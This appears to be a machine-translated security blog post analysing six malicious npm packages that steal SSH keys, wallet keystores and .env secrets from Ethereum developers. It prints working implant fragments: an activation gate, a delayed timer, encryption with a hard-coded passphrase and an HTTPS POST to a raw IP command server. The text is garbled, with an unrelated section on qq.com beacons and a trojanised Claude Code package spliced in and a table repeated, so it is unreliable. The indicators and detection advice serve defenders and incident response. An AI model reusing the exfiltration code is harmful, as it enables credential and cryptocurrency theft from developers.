د تمديد؛ DR
د می په ۶مه، ۲۰۲۶، د npm یو واحد خپرونکی، namikazesarada010206، شپږ ناوړه کڅوړې یې وغځولې چې ایتیریم، سولیډیټي، او ډی فای پراختیا کونکي ایکوسیستم یې په نښه کاوه.
کڅوړې، viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils، او web3-utils-core، د مشهور ویب 3 وسیلو لپاره د مرستندویه کتابتونونو په څیر ډیزاین شوي معقول نومونه کارول شوي.
ټولو شپږو کڅوړو کې یو شان وو telemetry.js فایل. فایل د کلستر په اوږدو کې د بایټ سره ورته و، د SHA-256 سره:
مالویر د نصبولو په وخت کې نه اجرا کیږي. نشته preinstall or postinstall هک. پرځای یې، دا فعال کیږي کله چې بسته د require().
دا تفصیل مهم دی.
امپلانټ تر هغه وخته پورې انتظار کوي چې یو پراختیا کونکی په حقیقت کې دا بسته وکاروي. بیا دا ګوري چې ایا ورک سټیشن د ریښتیني ایتیریم / سولیډیټي پراختیا چاپیریال په څیر ښکاري. دا د کیمیا یا انفورا کیلي، شخصي کیلي، یادونو، ډیپلویر کیلي، یا د محلي فاؤنډري لارښود لپاره ګوري.
که کوربه سره سمون خوري، غلا کوونکی د SSH شخصي کیلي، فاؤنډري / ګیت / براوني والټ کیلي پلورنځي راټولوي، .env* فایلونه، او حساس چاپیریال متغیرات. دا بنډل د AES-256-GCM سره د هارډ کوډ شوي پاسفریج په کارولو سره کوډ کوي او د TLS تایید غیر فعالولو سره یې خام IPv4 C2 پای ټکي ته خپروي.
د زیګیني د مالویر لومړني خبرداري (MEW) سیسټم ټول شپږ پیکجونه د ناوړه په توګه تایید کړل. د npm راجسټری لرې کولو راپور بنډل په تمه دی.
کلستر: شپږ کڅوړې، یو خپرونکی
د خپرونکي حساب namikazesarada010206 د نا تایید شوي Gmail پتې سره تړل شوی و namikazesarada010206@gmail.com.
دا کمپاین د ۲۰۲۶ کال د می په ۶مه د یوې ورځې خپرونې په توګه راڅرګند شو. ټولې شپږ کڅوړې په لاندې ډول نسخې شوې وې: 1.0.0، د صفر رن ټایم انحصار درلود، او یوازې درې فایلونه یې لیږلي وو:
package.json index.js telemetry.js دوی د ورته سرچینې ذخیره هم اعلان کړه:
https://github.com/harunosakura030303-maker/evmchain-config لومړني درې کڅوړې د لومړي خپرونې په وخت کې د MEW سکینرونو لخوا ونیول شوې. پاتې درې یې د خپرونکي د npm پروفایل د شنونکي بیاکتنې وروسته په زور سره بیرغ شوي. یوځل ورته بایټ ورته telemetry.js په ټول کلستر کې تایید شوي، دوی د تسلسل له مخې د ناوړه په توګه تړل شوي وو.
| هګ | نسخه | npm خپور شو | د MEW ټکټ | حکم |
|---|---|---|---|---|
| ویم کور | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | ناوړه |
| د ویم-یوټیلز-کور | 1.0.0 | 2026-05-06 | #51050 | ناوړه |
| د هارډ هیټ کور کارونې | 1.0.0 | 2026-05-06 | #51051 | ناوړه |
| د ای وی ایم کارول | 1.0.0 | 2026-05-06 | #51069 | ناوړه، په دوامداره توګه |
| د فاونډري کارونې | 1.0.0 | 2026-05-06 | #51071 | ناوړه، په دوامداره توګه |
| web3-utils-core د | 1.0.0 | 2026-05-06 | #51070 | ناوړه، په دوامداره توګه |
د نوم ورکولو ستراتیژي ساده خو اغیزمنه ده.
دا کڅوړې دقیق نومونه نه تقلید کوي. پرځای یې، دوی د "ګټورتیا" ضمیمې کاروي لکه -core, -utils، او -utils-core. دا دوی د ملګرو کتابتونونو په څیر ښکاري چې یو پراختیا کونکی یې د ویب 3 وسیلو سره نږدې د لیدلو تمه کولی شي.
| ناوړه بسته | مشروع هدف |
|---|---|
| ویم کور | ویم، د ایتیریم ټایپ سکریپټ یو مشهور پیرودونکی |
| د ویم-یوټیلز-کور | وايم |
| د هارډ هیټ کور کارونې | هارډ هیټ، د سولیډیټي پراختیا یو عام چاپیریال |
| د ای وی ایم کارول | د EVM د وسیلې عمومي نوم ځای |
| د فاونډري کارونې | فاونډري، د سولیډیټي وسیلو زنځیر |
| web3-utils-core د | web3-utils، Web3.js مرسته کوونکي |
دا د "اضافي کڅوړې" نمونه ده: نه "زه اصلي کڅوړه یم،" بلکې "زه د اصلي کڅوړې شاوخوا یو معقول مرسته کوونکی ښکاري."
د DeFi پراختیا کونکو لپاره چې ګړندي حرکت کوي، دا د خطر رامینځته کولو لپاره کافي دي.
کله چې بسته وارد شي نو څه پیښیږي؟
د برید سلسله کوچنۍ، قصدي، او د کریپټو پراختیا چاپیریالونو باندې متمرکزه ده.
د نصبولو هک نشته. پرځای یې، په هر پیکج کې یو شامل دی index.js چې د سټب فعالیت صادروي او بیا د ناوړه ټیلی میټري ماډل باروي.
require('./telemetry').init(); دا پدې مانا ده چې مالویر په لومړي واردولو سره فعال کیږي.
دا د برید کونکي لپاره په عملیاتي توګه ګټور دی. ډیری سکینرونه او سینڈ باکسونه د نصب کولو وخت چلند باندې تمرکز کوي. دا بسته تر هغه وخته پورې انتظار کوي چې دا په حقیقت کې د پراختیا کونکي، جوړونې سکریپټ، ازموینې سویټ، یا د چلولو وخت لارې لخوا کارول کیږي.
د فعالولو دروازه: یوازې په ریښتیني ویب 3 پراختیا کونکو کاري سټیشنونو کې اور لګیدلی
د امپلانټ تر ټولو مهمه برخه د فعالولو دروازه ده.
مالویر د چاپیریال متغیراتو لپاره چک کوي چې معمولا په ایتیریم / سولیډیټي پراختیا کونکي ماشینونو کې موندل کیږي:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); دا دا هم ګوري چې ایا فاؤنډري نصب شوی ښکاري:
fs.existsSync(path.join(os.homedir(), '.foundry')) که چیرې هیڅ حالت ریښتیا نه وي، نو فعالیت بیرته راځي او هیڅ نه کوي.
دا په عمومي تحلیلي چاپیریال کې بسته خاموشه کوي. د فاؤنډري، کیمیا کیلي، انفورا کیلي، شخصي کیلي، یا یادونو پرته یو سینڈ باکس ممکن بې ضرره ښکاري واردات وګوري.
په یوه مطابقت لرونکي کوربه کې، مالویر د راټولولو دمخه له 60 څخه تر 90 ثانیو پورې انتظار کوي:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ځنډ د وارداتو او اخراج ترمنځ ښکاره اړیکه کموي. .unref() کال د کوربه پروسې ته اجازه ورکوي چې په نورمال ډول ووځي که چیرې بسته په لنډمهاله سکریپټ کې وارد شوې وي.
دا د شورماشور وهلو او نیولو چلند نه دی. دا یو هدفمند غلا کوونکی دی چې د چلولو څخه د مخنیوي لپاره ډیزاین شوی پرته لدې چې د پراختیا کونکي چاپیریال د غلا کولو ارزښت ولري.
هغه څه چې غلا کوونکي راټولوي
کله چې د فعالولو دروازه تېره شي، مالویر له هغو سرچینو څخه راټولوي چې د ویب 3 پراختیا کې خورا مهم دي: شخصي کیلي، د والټ کیسټورونه، د ځای پرځای کولو اسناد، کلاوډ رازونه، د npm ټوکنونه، او د محلي پروژې ترتیب.
| سرچینه | څه راټول شوي دي |
|---|---|
| پروسه.این وی | هر متغیر مطابقت /ټوکن|پټ|کلیدي|پاس|لیک|شخصي|تخم|یادونه|یادونه|AWS|NPM|ځای پرځای کول/i |
| ~/.ssh/* | هغه فایلونه چې PRIVATE KEY یا BEGIN OPENSH لري، د بشپړ فایل مینځپانګې په ګډون |
| ~/.فاؤنډري/کليزي پلورنځي/* | د فاؤنډري والټ کیسټور فایلونه |
| ~/.اتیریم/کلیستور/* | د ګیت والټ کیسټور فایلونه |
| ~/.براوني/اکاؤنټونه/* | د براوني والټ کیسټور فایلونه |
| ${cwd}/.env | د بشپړ فایل منځپانګه |
| ${cwd}/.env.local | د بشپړ فایل منځپانګه |
| ${cwd}/.env.production | د بشپړ فایل منځپانګه |
| ${cwd}/.env.development | د بشپړ فایل منځپانګه |
| د کوربه نوم () | کوربه میټاډاټا |
| کریپټو.ناڅاپي UUID() | د قرباني/غونډې پیژندونکی |
| نیټه.اوس() | د راټولولو وخت ټاپه |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com د ATTA ټوکنونه دا دي:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 موږ نشو کولی دا تایید کړو چې ټیلی میټري د آپریټر خپل تحلیل و یا په جلا توګه د پیسو چینل. د ATTA ټوکنونه په دواړو نمونو کې یو شان دي چې موږ یې معاینه کړې.
کلستر ب: هیبای
claude.hk OAuth فشینګ + ANTHROPIC_BASE_URL تښتول
د اپریل د لومړۍ نیټې نمونه د کمپاین تر ټولو بې رحمه او پخوانۍ برخه ده.
heibai:2.1.88-claude.hk-4 لخوا خپور شو wuguoqiangvip28، یو حساب چې د جون په ۷، ۲۰۲۵ کې جوړ شو. دا کڅوړه په ښکاره ډول د مشروع خلاف بڼه لري 2.1.88 انتروپیک خوشې کول.
دا د CA-cert MITM سره هیڅ ستونزه نلري. پرځای یې، دا د OAuth پای ټکی په اړه کارونکي ته دروغ وايي.
د افشا شوي کلاډ کوډ سرچینې په سر کې ناوړه اضافه کول پدې کې شامل دي:
| سرچینه | څه راټول شوي دي |
|---|---|
| پروسه.این وی | هر متغیر مطابقت /ټوکن|پټ|کلیدي|پاس|لیک|شخصي|تخم|یادونه|یادونه|AWS|NPM|ځای پرځای کول/i |
| ~/.ssh/* | هغه فایلونه چې PRIVATE KEY یا BEGIN OPENSH لري، د بشپړ فایل مینځپانګې په ګډون |
| ~/.فاؤنډري/کليزي پلورنځي/* | د فاؤنډري والټ کیسټور فایلونه |
| ~/.اتیریم/کلیستور/* | د ګیت والټ کیسټور فایلونه |
| ~/.براوني/اکاؤنټونه/* | د براوني والټ کیسټور فایلونه |
| ${cwd}/.env | د بشپړ فایل منځپانګه |
| ${cwd}/.env.local | د بشپړ فایل منځپانګه |
| ${cwd}/.env.production | د بشپړ فایل منځپانګه |
| ${cwd}/.env.development | د بشپړ فایل منځپانګه |
| د کوربه نوم () | کوربه میټاډاټا |
| کریپټو.ناڅاپي UUID() | د قرباني/غونډې پیژندونکی |
| نیټه.اوس() | د راټولولو وخت ټاپه |
د هدف لیست خورا مشخص دی. دا د براوزر عمومي غلا یا پراخه اسناد سکریپ کول ندي. دا د هغو پراختیا کونکو لپاره دی چې د ایتیریم غوښتنلیکونه جوړوي، ازموینه کوي، ځای پر ځای کوي، یا چلوي.
د فاؤنډري، ګیت، او براوني کیسټورونو شاملول په ځانګړي ډول مهم دي. دا فایلونه کولی شي والټونو یا د ځای پرځای کولو پیژندنو ته مستقیم لاسرسی استازیتوب وکړي. که چیرې بریدګر دوی د پاسورډونو، یادونو، یا چاپیریال رازونو سره یوځای کړي، دوی ممکن د فنډونو لیږدولو، د ځای پرځای کونکو تقلید کولو، یا د سمارټ قرارداد عملیاتو سره جوړجاړی کولو توان ولري.
د اخراج څخه مخکې کوډ کول
مالویر راټول شوي معلومات د لیږلو دمخه کوډ کوي.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); هارډ کوډ شوی پاسفرېز دا دی:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d وروستی تادیه د JSON په توګه پوښل شوې ده:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} کوډ کول پخپله مالویر ډیر پرمختللی نه کوي. په هرصورت، دا د شبکې تفتیش سختوي. یو مدافع چې د وتلو څارنه کوي به د JSON پیلوډ وګوري، مګر غلا شوي کیلي، د والټ فایلونه، یا .env د هارډ کوډ شوي پاسفریج او ډیکریپشن منطق پرته محتويات.
خام IPv4 C2 ته اخراج
د اخراج لاره په سخت کوډ شوې ده:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); مالویر معلومات دې ته لیږي:
https://76.13.37.80:8443/api/v1/telemetry دوه جزئیات څرګند دي.
لومړی، C2 د ډومین پرځای یو خام IPv4 پته ده. دا د ډومین راجسټریشن اړتیا لرې کوي او د ډومین پر بنسټ ځینې کشفونو څخه مخنیوی کوي.
دوهم، د TLS تایید د لاندې سره غیر فعال دی:
rejectUnauthorized: false دا مالویر ته اجازه ورکوي چې هر ډول سند ومني، په شمول د ځان لاسلیک شوي سندونو. په بل عبارت، بریدګر د اعتبار وړ عامه سند ته اړتیا پرته کوډ شوی ټرانسپورټ ترلاسه کوي.
د بیا هڅې منطق او د فال بیک کوربه نشته. غلطۍ په خاموشۍ سره تیریږي. دا بسته خاموش ساتي که چیرې C2 آفلاین وي یا د لاسرسي وړ نه وي.
ولې دا کمپاین مهم دی
ډیری ناوړه npm کڅوړې چې هدف یې پراختیا کونکي دي پراخ اسناد تعقیبوي: npm ټوکنونه، AWS کیلي، GitHub ټوکنونه، یا .npmrc دوتنې
دا کمپاین هدف محدودوي.
دا د هغو نښو په لټه کې دی چې ماشین د ایتیریم یا سولیډیټي پراختیا کونکي پورې اړه لري. بیا دا په سمه توګه هغه شتمنۍ راوباسي چې په هغه چاپیریال کې مهم دي: د والټ کیسټورونه، شخصي کیلي، یادښتونه، د ډیپلویر کیلي، .env فایلونه، او SSH کیلي.
دا کمپاین د ویب 3 ټیمونو لپاره د عمومي npm غلا کونکي په پرتله ډیر خطرناک کوي.
یو بریالی انتان کولی شي ښکاره کړي:
- د ځای پرځای کولو بټوې
- د سمارټ قرارداد اداري کیلي
- د RPC چمتو کونکي کیلي
- د کلاوډ د ځای پرځای کولو اسناد
- د npm خپرونې نښې
- پراختیا ورکوونکي یا ساختماني زیربنا ته د SSH لاسرسی
- د پروژې رازونه په کې ساتل شوي دي
.envدوتنې - د فاؤنډري، ګیت، یا براوني لپاره د والټ کیلي پلورنځي
د پیکج نومونه هم روښانه ټولنیز انجینرۍ ښیي. دوی د پیژندل شویو وسیلو نومونو له لارې د ویب 3 پراختیا کونکي ایکوسیستم په نښه کوي: viem, hardhat, foundry, evm، او web3.
لوبغاړی اړتیا نلري چې د اصلي پروژو سره جوړجاړی وکړي. دوی یوازې یو پراختیا کونکي ته اړتیا لري ترڅو هغه څه نصب کړي چې د یو مناسب ملګري پیکج په څیر ښکاري.
د جوړجاړي او کشف شاخصونه
| کڅوړې او خپرونکي | |
|---|---|
| ساحوي | ارزښت |
| د npm خپرونکی | نامیکازیسردا010206 |
| د خپرونکي برېښنالیک | namikazesarada010206@gmail.com |
| برېښنالیک تایید شو | نه |
| SCM تصديق شوی | نه |
| د شهرت نمره | 1.0 |
| پيکيجز | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| بڼه | ټول 1.0.0 |
| د سرچینې ذخیره | https://github.com/harunosakura030303-maker/evmchain-config |
| تایید شوی ناوړه | ټول شپږ پیکجونه |
| شبکه | |
|---|---|
| ډول | ارزښت |
| د C2 پای ټکی | https://76.13.37.80:8443/api/v1/telemetry |
| د C2 IP | 76.13.37.80 |
| د C2 پورټ | 8443/tcp |
| د TLS چلند | ردول غیر مجاز: غلط |
| د بار سکیما | {"v":2,"iv": "د": "ټ": } |
| فایلونه او هېشونه | |
|---|---|
| ډول | ارزښت |
| ټیلی میټری.جۍ ایس ایچ اے-۲۵۶ | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| د بستې ترتیب | package.json، index.js، telemetry.js |
| د فایلونو شمېر | 3 |
| نږدې ټول اندازه | 3.4 KB |
د فعالولو سیګنالونه
مالویر د دې چاپیریال متغیرونو لپاره ګوري:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY دا د دې لپاره هم ګوري:
~/.foundry/ په نښه شوي کوربه لارې
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development د ریجیکس ټولګه
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i د کشف یادښتونه
ډیری قوانین د دې کمپاین سره سمون لري پرته له دې چې بشپړ چلند تحلیل ته اړتیا ولري.
لومړی، د شپږو ناوړه پیکج نومونو لپاره د لاک فایلونه سکین کړئ:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core په کې کومه لوبه package-lock.json, yarn.lock, pnpm-lock.yaml، او یا node_modules تاریخ باید د یوې جدي پیښې په توګه وپیژندل شي.
دوهم، د Node.js پروسو لپاره څارنه چې د والټ کیسټور لارې لوستل کیږي:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ دا په ندرت سره د هغه بستې لپاره مشروع چلند دی چې د مرستندویه انحصار په توګه وارد شوي وي. دا په ځانګړي ډول شکمن وي کله چې د شبکې فعالیت وروسته بهر ته ځي.
دریم، د HTTPS اړیکو په اړه بلاک یا خبرداری ورکړئ:
76.13.37.80:8443 په ځانګړي توګه کله چې د غوښتنې لاره دا وي:
/api/v1/telemetry څلورم، د npm پیکجونو لټون وکړئ چې دا ځانګړتیاوې سره یوځای کوي:
- نوی یا ټیټ شهرت لرونکی خپرونکی
- نا تایید شوی جي مېل حساب
- د ویب ۳ سره نږدې د بسته نوم
- د ذخیرې هیڅ معنی لرونکی تاریخ نشته
- د کوچني پیکج ترتیب
index.jsچې د ټیلی میټری یا مرستندویه فایل پورته کوي- د چلولو وخت پورې تړاو نشته
- د حساس چاپیریال متغیر ټولګه
- د والټ کیلي پلورنځي لاسرسی
دا نمونه د یو واحد IOC په پرتله ډیره ګټوره ده ځکه چې راتلونکی پیکج ممکن IP پته بدله کړي مګر ورته هدف منطق وساتي.
د جوړجاړي غبرګون چک لیست
که چیرې یو پراختیا کونکي د شپږو پیکجونو څخه یو کارولی وي او د دوی چاپیریال د فعالولو دروازې سره سمون ولري، نو د ورک سټیشن سره د جوړجاړي په توګه چلند وکړئ.
پدې کې هغه ماشینونه شامل دي چې د فاؤنډري نصب شوي وي، په چاپیریال کې د کیمیا یا انفورا کیلي، شخصي کیلي، یادښتونه، یا د ډیپلویر کیلي.
وړاندیز شوی ځواب:
- کوربه له شبکې څخه جلا کړئ.
- ساتل
node_modules، لاک فایلونه، د شیل تاریخ، او د عدلي طب لپاره اړونده لاګونه. - هر SSH کیلي جوړه لاندې وګرځوئ
~/.ssh/. - د هر کیلي پلورنځي لپاره د والټ کیلي وګرځوئ لاندې
~/.foundry,~/.ethereum، او~/.brownie. - فنډونه نوي بټو ته انتقال کړئ.
- هر راز چې په کې ساتل شوی وي وګرځوئ
.env*په هغو زیرمو کې فایلونه چې پراختیا کونکي پکې کار کاوه. - د چاپیریال رازونه چې د ټولګې ریجیکس سره سمون خوري، په شمول د AWS کیلي، npm ټوکن، ډیپلای ټوکن، API کیلي، شخصي کیلي، تخمونه، او یادښتونه وګرځوئ.
- د پلټنې کلاوډ، npm، GitHub، RPC چمتو کونکی، او د بلاکچین فعالیت له هغه وخته چې پیکج لومړی نصب شو.
- د بیا کارولو دمخه د کارځای بیا انځور کړئ.
هغه څه چې مدافعین باید لرې کړي
دا کمپاین ښیي چې څنګه د لوړ ارزښت لرونکي پراختیا کونکي ایکوسیستمونو شاوخوا د npm ټایپوسکاټینګ وده کوي.
لوبغاړی استقامت ته اړتیا نه درلوده. دوی ابهام ته اړتیا نه درلوده. دوی حتی د نصب وخت اجرا کولو ته اړتیا نه درلوده.
پرځای یې، دوی په دریو شیانو تکیه وکړه:
- د ویب ۳ د پیکجونو د منلو وړ نومونه
- یوازې په ریښتیني کریپټو-پراختیا ماشینونو کې فعالول
- د هغو فایلونو او رازونو مستقیم غلا چې د ایتیریم پراختیا کونکو لپاره خورا مهم دي
دا کمپاین په پراخه کچه د پلټنې له لاسه ورکول اسانه کوي او کله چې په سم چاپیریال کې راشي نو خطرناک وي.
د ویب ۳ ټیمونو لپاره، درس روښانه دی: د انحصار نومونو سره د خپل ګواښ ماډل د یوې برخې په توګه چلند وکړئ. یو بسته چې د بې ضرره مرستندویه په څیر ښکاري لاهم کولی شي د والټ جوړجاړي لپاره ترټولو لنډه لاره شي.
د npm راجستر ته راپور ورکړل شوی. موږ به دا پوسټ تازه کړو کله چې د خپرونکي حساب او کڅوړې لرې شي.




